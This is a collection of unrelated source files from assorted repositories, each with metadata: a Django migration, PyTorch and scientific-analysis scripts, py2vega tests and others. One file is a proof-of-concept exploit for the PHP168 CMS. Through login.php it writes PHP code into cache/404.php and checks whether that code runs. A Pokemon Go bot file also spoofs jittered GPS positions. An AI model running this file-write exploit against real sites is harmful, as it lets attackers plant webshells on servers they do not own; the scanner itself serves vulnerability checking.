'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus']
|
[
"oleg.dolya@gmail.com"
] |
oleg.dolya@gmail.com
|
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39
|
5b5eb61c02a1ee6632036a31108d5c962d474d2e
|
/00/pytorch.py
|
bae78442e40b561cf168d0df6d691ad703c08406
|
[] |
no_license
|
seven320/deeplearning
|
73c76fa5e006a9164ed11fe9538b4975c0bdc161
|
56300e450caf390b4f953a9c882a9b4701ccb971
|
refs/heads/master
| 2021-04-26T22:27:47.019462
| 2018-11-06T02:09:04
| 2018-11-06T02:09:04
| 124,096,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,648
|
py
|
# coding: utf-8
# What is PyTorch?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# Randomly initialized matrix
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
# Zero-initialized matrix
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# A tensor constructed directly from data values
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
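# Move the tensor to the GPU when CUDA is available, add on the device, then copy the result back to the CPU as double precision.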
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
|
[
"yosyuaomenw@yahoo.co.jp"
] |
yosyuaomenw@yahoo.co.jp
|
4a70189f56b7c999e46df08262eb3ac37e231c87
|
77871bb4c5f4714a19c33ad804a20c94bcdacc7e
|
/Interfaces/AI/Stepper/Pokestopper.py
|
abd44d28f5e7de1647e7ca9a35e479c9fd8da45b
|
[] |
no_license
|
MaxOnNet/PokeStats
|
58165f449acf3fc5b14e4f3a63a783f947df3eb8
|
3eb5aa2d13833b1d2299023f4d6f88348bae3bd6
|
refs/heads/master
| 2021-01-20T20:28:56.999545
| 2016-08-24T08:06:41
| 2016-08-24T08:06:41
| 63,936,162
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,961
|
py
|
# -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
def inicialise(self):
log.info('Точечное сканирование P\S, переопределяем переменные БД')
self.scanner.mode.step = 0.0015
self.scanner.mode.walk = 6
self.scanner.mode.is_catch = False
self.scanner.mode.is_farm = True
self.scanner.mode.is_lookup = False
self.scanner.mode.is_defender = False
def take_step(self):
position = [self.origin_lat, self.origin_lon, 0]
coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
self.api.set_position(*position)
step = 1
for coord in coords:
self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
position = (coord['lat'], coord['lng'], 0)
if self.walk > 0:
self._walk_to(self.walk, *position)
else:
self.api.set_position(*position)
self.ai.heartbeat()
self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
step += 1
def _walk_to(self, speed, lat, lng, alt):
dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
steps = (dist + 0.0) / (speed + 0.0) # may be rational number
intSteps = int(steps)
residuum = steps - intSteps
log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
" на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
if steps != 0:
dLat = (lat - self.api._position_lat) / steps
dLng = (lng - self.api._position_lng) / steps
for i in range(intSteps):
cLat = self.api._position_lat + dLat + random_lat_long_delta()
cLng = self.api._position_lng + dLng + random_lat_long_delta()
self.api.set_position(cLat, cLng, alt)
self.ai.heartbeat()
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
self.api.set_position(lat, lng, alt)
self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
def generate_coords(self, latitude, longitude, step_size, distance):
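# Select pokestops within the requested distance (in metres) of the given point using the spherical law of cosines (Earth radius 6371 km), then jitter each coordinate slightly before returning it.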
sql = """
SELECT
id as "pokestop_id",
latitude as "pokestop_latitude",
longitude as "pokestop_longitude",
(
6371 * acos (
cos ( radians({0}) )
* cos( radians( latitude ) )
* cos( radians( longitude ) - radians({1}) )
+ sin ( radians({2}) )
* sin( radians( latitude ) )
) * 1000
) AS "pokestop_distance"
FROM pokestop
HAVING pokestop_distance < {3}
ORDER BY pokestop_distance
""".format(latitude, longitude, latitude, distance)
coords = []
for pokestop in self.session.execute(sql_text(sql)):
lat = pokestop[1] + random_lat_long_delta()
lng = pokestop[2] + random_lat_long_delta()
coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
return coords
|
[
"viktor@tatarnikov.org"
] |
viktor@tatarnikov.org
|
72d83f61ea7278de06a9f45c110a3ffba2430063
|
163808746e51d378f69a966645b8bb8a855b4625
|
/MyMain1012/MyMain1012/mislHrf.py
|
860d28ba23c0e7b4b51f525d9b16734181920a56
|
[] |
no_license
|
0024thiroshi/comm5.0_fall_semester
|
02b26b506b759dd7b18b963295a8908cb4a78245
|
db350599b7085e56fbf2c316e74cd7a5b48f02b8
|
refs/heads/main
| 2023-02-12T13:07:34.080809
| 2021-01-13T06:03:04
| 2021-01-13T06:03:04
| 329,202,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
peak_delay=6,
under_delay=10,
p_u_ratio = 6,):  # nt: sampling interval (time step)
t = np.arange(0,30+nt,nt)
peak_disp=1
under_disp=1
normalize=True
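# Canonical double-gamma HRF: a gamma-shaped peak minus an undershoot scaled down by p_u_ratio, optionally normalised to a peak of 1.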
hrf = np.zeros(t.shape, dtype=np.float)
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay/peak_disp,
loc=0,
scale=peak_disp)
UD = under_delay + peak_delay
undershoot = sps.gamma.pdf(pos_t,
UD / under_disp,
loc=0,
scale=under_disp)
hrf = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
|
[
"“0024thiroshi@gmail.com”"
] |
“0024thiroshi@gmail.com”
|
e7e44f6c501f1455b389ef57e85fc9f635efc6a2
|
b0ddd37a614556785b2ecd3d408357fd010ed72f
|
/test/test_py2vega.py
|
61017752de6e06bfb281d05b43ba4bed2c5c5854
|
[
"BSD-3-Clause"
] |
permissive
|
codeaudit/py2vega
|
837c9b347f4968956656fcfbc15b2d69110e267f
|
a3a94bf7e29414a649b796e3202a5621befadbb3
|
refs/heads/master
| 2020-07-07T13:06:04.690110
| 2019-08-20T08:49:12
| 2019-08-20T08:49:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,294
|
py
|
import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
|
[
"martin.renou@gmail.com"
] |
martin.renou@gmail.com
|
d771baddfaa09a4c3db22756b3f490f38382cbf3
|
afada51a34ebc932fc9ca824ecf56aae04e3d74b
|
/lib/enrichment_modules.py
|
b74c4fce6db72594a14b0b79acb4fe6ac996284c
|
[] |
no_license
|
SkBlaz/CBSSD
|
0ec8c7e3fc2765d4897b650f584e97afabf7c4f6
|
3043a76c7065fa0f13770f38d3b7b3f661a9f117
|
refs/heads/master
| 2021-01-01T19:53:21.190536
| 2019-02-01T06:31:23
| 2019-02-01T06:31:23
| 98,710,089
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,931
|
py
|
##### this Python code enables enrichment calculation from the graph results of the previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
# _partition_name,_partition_entries,term,_map_term_database,_number_of_all_annotated
## this calculates p value
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
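# For every partition, test each term for over-representation with Fisher's exact test against the annotated population, then keep only terms that remain significant after Benjamini-Hochberg correction.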
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
## computational pool instantiation
ncpu = 2 #mp.cpu_count()
pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
|
[
"skrljblaz@gmail.com"
] |
skrljblaz@gmail.com
|
3e01df71c43a92672a6b4387ffcd0d505ed0ef01
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/cms/php168/php168_login_getshell.py
|
08224eb0012c6eed6e10a98c7606dfd32c336bc4
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105
| 2019-01-29T09:31:31
| 2019-01-29T09:31:31
| 168,127,418
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,581
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL vulnerability
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Searching for "Powered by php168 v6" (or the older v5, v4, v3, v2, v1) turns up a great many affected sites; the login.php file can be abused to write code into the cache directory.
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"wangxinyu@vackbot.com"
] |
wangxinyu@vackbot.com
|
86024511a554590ea7ae122070eab0f619c43d93
|
4fd5860beb1e6809eee297509bcc776dfca40aca
|
/event_synchronization_analysis/ed_lf_es_mc.py
|
cab4b7d9f4e05674b37592ab836218dde4a38ed7
|
[] |
no_license
|
manmeet3591/fingerprint-volcano-enso-im
|
40a41eca517abdd09079feb7ae58cc866343d6a8
|
21f39125ece4d03c5ee2961e4aae3768ee61cdb8
|
refs/heads/master
| 2021-07-05T09:49:28.858614
| 2021-04-19T02:55:45
| 2021-04-19T02:55:45
| 229,057,834
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,004
|
py
|
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
dismr_anom[0:n//2] = ( dismr[0:n//2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
dismr_anom[dismr.shape[0]-n//2:] = ( dismr[dismr.shape[0]-n//2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
#print(dismr_anom)
dismr_std[0:n//2] = np.std(dismr[0:n])
dismr_std[dismr.shape[0]-n//2:] = np.std(dismr[dismr.shape[0]-n:])
# slice bounds must be integers, so the half-window size uses floor division
for i in range(n//2, dismr.shape[0]-n//2):
dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n//2:i+n//2]))/np.std(dismr[i-n//2:i+n//2])
dismr_std[i] = np.std(dismr[i-n//2:i+n//2])
return dismr_anom, dismr_std
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
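# Slide a window of length taumax over the series and store the symmetrised event-synchronization strength: deficit events vs El Nino events (Q_hist_ed) and flood events vs La Nina events (Q_hist_lf).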
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
|
[
"manmeet20singh11@gmail.com"
] |
manmeet20singh11@gmail.com
|
03a9dfea771fb783bbd10950701d0049f6fa4eb3
|
b76e39e535499704368eddc26237dc0016ef7d06
|
/RailRites/allsiemensdriveprocessing.py
|
a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa
|
[] |
no_license
|
BUBAIMITRA2018/castersimulation
|
0532e53df7d346c2824e577cc91cd0ac2ce4694c
|
eca5fddff5c0f33f785168f6b1e9f572c1622be0
|
refs/heads/master
| 2022-12-10T02:45:04.207196
| 2020-09-09T05:35:54
| 2020-09-09T05:35:54
| 260,110,682
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
